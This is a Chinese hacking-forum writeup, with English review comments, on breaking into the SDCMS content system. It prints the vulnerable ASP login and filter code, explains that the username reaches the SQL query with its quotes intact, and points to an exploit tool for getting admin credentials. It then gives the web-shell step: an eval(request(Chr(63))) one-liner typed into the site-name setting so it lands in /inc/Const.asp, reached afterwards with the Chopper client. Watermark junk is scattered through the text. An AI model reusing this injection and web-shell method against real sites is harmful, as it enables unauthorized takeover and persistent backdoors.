作者:T00LS 鬼哥
漏洞文件:后台目录/index.asp
' Check — admin login handler (the page presents it as the back-end index.asp).
' NOTE(review): the listing on this page is interleaved with anti-copy watermark
' characters; the code below was reconstructed from it (including the ":died"
' terminators on the Alert/Echo lines). Confirm against the original file.
Sub Check
    Dim username,password,code,getcode,Rs
    ' Check_post is defined elsewhere; judging by the message it rejects
    ' submissions that do not originate from the site itself — confirm.
    IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
    ' FilterText mode 1 only strips spaces and line breaks (see FilterText below);
    ' single quotes survive, so username is NOT safe to splice into SQL.
    username=FilterText(Trim(Request.Form("username")),1)
    password=FilterText(Trim(Request.Form("password")),1)
    code=Trim(Request.Form("yzm"))
    getcode=Session("SDCMSCode")
    ' Daily lockout; errnum and loginnum are maintained elsewhere in the application.
    IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
    IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)":died
    IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)":died
    ' Nothing in this Sub resets Session("SDCMSCode") after the comparison; unless
    ' it is regenerated elsewhere, one captcha value stays valid across attempts — confirm.
    IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)":died
    IF username="" or password="" Then
        Echo "用户名或密码不能为空":died
    Else
        ' SQL injection point: username is concatenated into the WHERE clause with
        ' no quoting or escaping. The password side is md5()'d before concatenation,
        ' so only the username reaches the query as attacker-controlled text.
        ' Mitigation: an ADODB.Command with parameters (at minimum
        ' Replace(username,"'","''")), and comparing the stored hash in code
        ' instead of inside the query.
        Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
        IF Rs.Eof Then
            AddLog username,GetIp,"登录失败",1
            Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
        Else
            ' Login state is carried in cookies, including the stored password
            ' hash (Rs(2)) under "sdcms_pwd"; presumably later requests are
            ' authenticated from these cookies — verify in the cookie-check code.
            Add_Cookies "sdcms_id",Rs(0)
            Add_Cookies "sdcms_name",username
            Add_Cookies "sdcms_pwd",Rs(2)
            Add_Cookies "sdcms_admin",Rs(3)
            Add_Cookies "sdcms_alllever",Rs(4)
            Add_Cookies "sdcms_infolever",Rs(5)
            ' GetIp is also spliced into SQL as a string; whether it is
            ' attacker-influenced depends on how GetIp is implemented (not shown here).
            Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
            AddLog username,GetIp,"登录成功",1
            ' Automatically delete log records older than 30 days
            ' (Sdcms_DataType appears to select Access-style Now() vs SQL Server GetDate() syntax).
            IF Sdcms_DataType Then
                Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
            Else
                Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
            End IF
            Go("sdcms_index.asp")
        End IF
        Rs.Close
        Set Rs=Nothing
    End IF
End Sub
/ Y W+ ]" V" S# j: Q* n7 F2 O; O
我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
' FilterText(t0, t1) — strips characters from string t0 according to mode t1 and
' returns the result. It is a character stripper, not an SQL or HTML escaper.
' NOTE(review): reconstructed from a watermark-garbled listing; confirm against the source.
Function FilterText(ByVal t0,ByVal t1)
    ' Empty, Null or array input yields "". (Len(t0)=0 is evaluated before IsNull,
    ' so Null input relies on VBScript's Null propagation through Or — worth checking.)
    IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
    t0=Trim(t0)
    ' The caller on this page passes the numeric literal 1 while the cases compare
    ' against the strings "1"/"2"; the writeup treats numeric 1 as matching Case "1".
    Select Case t1
        Case "1"
            ' Mode 1: only space, CR and LF are removed. Quotes, semicolons and
            ' comment markers pass through, so the output is not safe for
            ' string-built SQL. (The Chr(10)&Chr(10) pass is subsumed by the
            ' single Chr(10) pass that follows.)
            t0=Replace(t0,Chr(32),"")
            t0=Replace(t0,Chr(13),"")
            t0=Replace(t0,Chr(10)&Chr(10),"")
            t0=Replace(t0,Chr(10),"")
        Case "2"
            ' Mode 2: removes a fixed list of control characters and ASCII punctuation.
            t0=Replace(t0,Chr(8),"")'backspace
            t0=Replace(t0,Chr(9),"")'tab (horizontal)
            t0=Replace(t0,Chr(10),"")'line feed
            t0=Replace(t0,Chr(11),"")'vertical tab
            t0=Replace(t0,Chr(12),"")'form feed
            t0=Replace(t0,Chr(13),"")'carriage return (chr(13)&chr(10) is the CR+LF pair)
            t0=Replace(t0,Chr(22),"")
            t0=Replace(t0,Chr(32),"")'space
            t0=Replace(t0,Chr(33),"")'!
            t0=Replace(t0,Chr(34),"")'"
            t0=Replace(t0,Chr(35),"")'#
            t0=Replace(t0,Chr(36),"")'$
            t0=Replace(t0,Chr(37),"")'%
            t0=Replace(t0,Chr(38),"")'&
            t0=Replace(t0,Chr(39),"")''
            t0=Replace(t0,Chr(40),"")'(
            t0=Replace(t0,Chr(41),"")')
            t0=Replace(t0,Chr(42),"")'*
            t0=Replace(t0,Chr(43),"")'+
            t0=Replace(t0,Chr(44),"")',
            t0=Replace(t0,Chr(45),"")'-
            t0=Replace(t0,Chr(46),"")'.
            t0=Replace(t0,Chr(47),"")'/
            t0=Replace(t0,Chr(58),"")':
            t0=Replace(t0,Chr(59),"")';
            t0=Replace(t0,Chr(60),"")'<
            t0=Replace(t0,Chr(61),"")'=
            t0=Replace(t0,Chr(62),"")'>
            t0=Replace(t0,Chr(63),"")'?
            t0=Replace(t0,Chr(64),"")'@
            t0=Replace(t0,Chr(91),"")'[
            t0=Replace(t0,Chr(92),"")'\
            t0=Replace(t0,Chr(93),"")']
            t0=Replace(t0,Chr(94),"")'^
            t0=Replace(t0,Chr(95),"")'_
            t0=Replace(t0,Chr(96),"")'`
            t0=Replace(t0,Chr(123),"")'{
            t0=Replace(t0,Chr(124),"")'|
            t0=Replace(t0,Chr(125),"")'}
            t0=Replace(t0,Chr(126),"")'~
        Case Else
            ' As printed on this page each Replace maps a character to itself (and
            ' the third one is not even a valid literal); in the original these are
            ' most likely HTML-entity substitutions that the page rendering decoded
            ' back to plain characters — confirm against the source file.
            t0=Replace(t0, "&", "&")
            t0=Replace(t0, "'", "'")
            t0=Replace(t0, """", """)
            t0=Replace(t0, "<", "<")
            t0=Replace(t0, ">", ">")
    End Select
    ' Breaks the token "expression" by inserting what appears to be an invisible
    ' character between "e" and "xpression" — presumably to neutralise CSS
    ' expression(); confirm the exact character in the source. The guard is
    ' case-insensitive (Lcase) but the Replace uses compare 0 (binary, i.e.
    ' case-sensitive), so mixed-case spellings pass the guard yet are left
    ' unchanged; compare 1 (vbTextCompare) would make the two agree.
    IF Instr(Lcase(t0),"expression")>0 Then
        t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
    End If
    FilterText=t0
End Function
; g! y! M, _- v8 j+ q1 K7 O# E
看到没。直接参数是1 只过滤
t0=Replace(t0,Chr(32),"")
t0=Replace(t0,Chr(13),"")
t0=Replace(t0,Chr(10)&Chr(10),"")
t0=Replace(t0,Chr(10),"")
也就是说参数为1时并不会去掉单引号(Chr(39)),username原样拼进了Check里的SQL语句。漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/,如果站长改了后台路径,那么请自行查找!
! S8 D! L5 _0 l3 V# I5 {. Y# `EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP! ? Y7 V# R5 g* a
* C% Q- B K/ Q: j7 G$ U测试:
' l& I" l8 q/ p6 L9 F
' u% o4 |9 s7 U; r5 A
" f% Y) I5 ?" b; a# T; o6 E& }现在输入工具上验证码,然后点OK
: y% p9 w j# C6 P4 v- X( |& a% H9 c( W- ~
4 G4 w, D0 y. I( k看到我们直接进入后台管理界面了,呵呵!
* f9 f$ @- G# r$ O$ p' Y$ R* |0 F! B8 n
$ _/ `' y9 ~4 ]9 T7 y
. L! k" C; N. H3 o- Y这样直接进入后台了。。。。. W6 i9 I- B7 a, B9 n$ Y/ V
) s! Y# {( O. m" g, r( c, o8 r: N1 k
k% i0 @7 I: o8 N0 z% J, G
( i$ t# z4 t R% vSDCMS提权:
4 v( N! `7 }% t' C$ W" a- l. ]0 Z& L. S
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?. V3 O. K+ n u
6 w8 u% t9 x( z! O7 S
?1 C9 J2 V: j1 Y1 T! Y
. t0 I% e0 \; EOK,现在用菜刀连接下!/ k: p4 p, f& @
$ b3 ~7 K$ R5 E; D3 i9 [4 a! k0 Q( F
Z$ b7 P+ b9 Y; {
) F! j& U3 g" _1 ?/ I
' I; u2 |( A8 ]! r
/ u5 z# p* g7 W8 X5 _ |